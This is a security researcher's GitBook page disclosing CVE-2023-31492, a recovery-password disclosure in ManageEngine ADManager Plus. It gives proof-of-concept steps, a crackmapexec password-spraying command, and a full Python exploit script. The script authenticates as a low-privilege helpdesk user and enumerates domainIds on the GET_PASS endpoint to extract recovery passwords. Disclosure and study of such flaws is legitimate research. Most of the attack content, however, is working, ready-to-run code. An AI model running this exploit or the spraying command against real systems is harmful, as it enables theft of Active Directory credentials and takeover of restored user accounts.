UI
  • ABOUT US
  • UNSAFE
    • sAMAccountName Spoofing in the Forest
    • Pass-the-Hash Attack Over Named Pipes Against ESET Server Security
    • Netcat Relay
    • Hiren's BootCD in the AD
    • Abusing LAPS
  • INLINE
    • Asena
    • Suyla
    • dcFinder
  • 0DAY
    • ADManager Plus Build < 7210 Elevation of Privilege Vulnerability (CVE-2024-24409)
    • Asp.Net Zero v12.3.0 - HTML Injection Leads To Open Redirect via Websockets (CVE-2023-48003)
    • ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure (CVE-2023-31492)
    • Multiple ManageEngine Applications Critical Information Disclosure Vulnerability
    • Thecus N4800Eco Nas Server Control Panel Comand Injection
    • ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)
    • Openlitespeed Web Server 1.7.8 - Privilege Escalation (CVE-2021-26758)
    • KLOG Server (Authenticated) Command Injection (CVE-2021-3317)
    • Cokpit version 234 - Server Side Request Forgery (CVE-2020-35850)
    • KLOG Server Unauthenticated Command Injection (CVE-2020-35729)
    • Pearson Vue - VUEApplicationWrapper Unquoted Service Path (CVE-2020-36154)
    • Intel(r) Management and Security Application 5.2 - UNS Unquoted Service Path
    • BRAdmin Professional 3.75 - Unquoted Service Path
Powered by GitBook
On this page
  • # Proof of Concept
  • # The Exploit

Was this helpful?

  1. 0DAY

ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure (CVE-2023-31492)

PreviousAsp.Net Zero v12.3.0 - HTML Injection Leads To Open Redirect via Websockets (CVE-2023-48003)NextMultiple ManageEngine Applications Critical Information Disclosure Vulnerability

Last updated 1 year ago

Was this helpful?

The Recovery Settings helps you configure the restore and recycle options pertaining to the objects in the domain you wish to recover. When deleted user accounts are restored, defined password is set to the user accounts.

The helpdesk technician user that has not privilege for backup/recovery operations can view the password and then compromise restored user accounts conducting password spraying attack in the Active Directory environment

# Proof of Concept

  • Login as a helpdesk technician that has not privilege over backup/recovery.

  • Go to the URL

  • The password of other domains (if it is set) can be viewed changing req parameter value such as {"domainId":"2"}

  • We can conduct password spraying to inspect restored account if the password is not changed after the account restoration.

crackmapexec smb <target-DC> -u users.txt -p unsafe.local@2023 --continue-on-success

# The Exploit

# Exploit Title: ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/ad-manager/
# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/admanager-recovery-password-disclosure.md
# Version: ADManager Plus Build < 7183
# Tested against: Build 7180
# CVE: CVE-2023-31492

import argparse
import requests
import urllib3
import sys

"""
The Recovery Settings helps you configure the restore and recycle options pertaining to the objects in the domain you wish to recover. 
When deleted user accounts are restored, defined password is set to the user accounts. 
Helpdesk technician that has not privilege for backup/recovery operations can view the password and then compromise restored user accounts conducting password spraying attack in the Active Directory environment.
"""

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def getPass(target, auth, user, password):
    with requests.Session() as s:
        if auth.lower() == 'admanager':
            auth = 'ADManager Plus Authentication'
        data = {
            "is_admp_pass_encrypted": "false",
            "j_username": user,
            "j_password": password,
            "domainName": auth,
            "AUTHRULE_NAME": "ADAuthenticator"
        }
        # Login
        url = target + 'j_security_check?LogoutFromSSO=true'
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)
        if 'Cookie' in req.request.headers:
            print('[+] Authentication successful!')
        elif req.status_code == 200:
            print('[-] Invalid login name/password!')
            sys.exit(0)
        else:
            print('[-] Something went wrong!')
            sys.exit(1)

        # Fetching recovery password
        for i in range(1, 6):
            print('[*] Trying to fetch recovery password for domainId: %s !' % i)
            passUrl = target + 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' + str(i) + '%22%7D'
            passReq = s.get(passUrl, headers=headers, allow_redirects=False, verify=False)
            if passReq.content:
                print(passReq.content)


def main():
    arg = get_args()
    target = arg.target
    auth = arg.auth
    user = arg.user
    password = arg.password
    getPass(target, auth, user, password)


def get_args():
    parser = argparse.ArgumentParser(
        epilog="Example: exploit.py -t https://target/ -a unsafe.local -u operator1 -p operator1")
    parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
    parser.add_argument('-a', '--auth', required=True, action='store',
                        help='If you have credentials of the application user, type admanager. If you have credentials of the domain user, type domain DNS name of the target domain.')
    parser.add_argument('-u', '--user', required=True, action='store')
    parser.add_argument('-p', '--password', required=True, action='store')
    args = parser.parse_args()
    return args


main()
# Author: Metin Yunus Kandemir
https://target/ConfigureRecoverySettings/GET_PASS?req={"domainId"%3A"1"}
https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-31492.htmlwww.manageengine.com
PoC Request
Output Of The Exploit